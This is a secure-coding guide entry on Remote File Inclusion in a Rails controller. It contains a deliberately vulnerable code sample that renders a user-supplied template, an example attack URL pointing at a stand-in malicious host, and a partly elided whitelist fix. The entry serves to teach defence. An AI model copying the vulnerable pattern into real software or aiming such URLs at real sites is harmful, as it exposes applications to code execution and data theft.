Remote File Inclusion
Need
Prevention of remote file inclusion and execution
Context
• Usage of Ruby 2.5 for executing Ruby code and running Ruby applications
• Usage of Rails framework for building web applications
• Usage of ActiveRecord for Object-Relational Mapping (ORM) in database operations
Description
1. Non compliant code
class UserController < ApplicationController
def index
@user = User.find(params[:id])
render params[:template]
end
endIn the above code, we have a UserController with an index action that fetches a user from the database using an id passed in via params. After fetching the user, it renders a template also passed in via params. The vulnerability here lies in the use of `params[:template]` in the `render` method. This allows an attacker to pass in a path to a malicious template that resides in a remote location. This is known as Remote File Inclusion (RFI). For instance, an attacker could craft a URL such as `http://yourwebsite.com/user/index?template=http://maliciouswebsite.com/malicious_template`. When this URL is accessed, the application would fetch the malicious template from the remote server and render it, leading to potential data leakage or remote command execution.
2. Steps
• Sanitize user input: Validate and sanitize any user input before using it to render templates.
• Whitelist allowed templates: Create a whitelist of allowed templates and only render templates from this list.
• Avoid dynamic template rendering: Instead of allowing users to specify the template to render, use a fixed template or a limited set of predefined templates.
• Implement access controls: Ensure that only authorized users can access the UserController#index action.
• Keep the application and dependencies up to date: Regularly update the Ruby on Rails framework and its dependencies to benefit from security patches and fixes.
• Implement a Web Application Firewall (WAF): Use a WAF to detect and block attempts to exploit remote file inclusion vulnerabilities.
• Perform security testing: Regularly conduct security testing, such as penetration testing and code reviews, to identify and fix vulnerabilities.
3. Secure code example
class UserController < ApplicationController
before_action :authenticate_user!
TEMPLATE_WHITELIST = ['template1', 'template2', 'template3']
def index
@user = User.find(params[:id])
template = params[:template]
render template...The updated code includes several measures to mitigate the risk of Remote File Inclusion: 1. **Sanitize user input**: The `params[:template]` is now checked against a whitelist of allowed templates (`TEMPLATE_WHITELIST`). If the provided template is not in the whitelist, a default template is rendered. This ensures that only valid templates can be rendered, preventing the inclusion of malicious files. 2. **Whitelist allowed templates**: The `TEMPLATE_WHITELIST` constant is a list of allowed templates. This is a form of input validation that ensures only predefined templates can be rendered. 3. **Avoid dynamic template rendering**: By checking the user-provided template against a whitelist, the application no longer allows arbitrary templates to be rendered. This reduces the attack surface for Remote File Inclusion. 4. **Implement access controls**: The `before_action :authenticate_user!` ensures that only authenticated users can access the `index` action. This is a form of access control that can prevent unauthorized access to sensitive data. Remember to keep your application and its dependencies up to date, implement a Web Application Firewall (WAF), and perform regular security testing to further enhance the security of your application.
References
• 061. Remote File Inclusion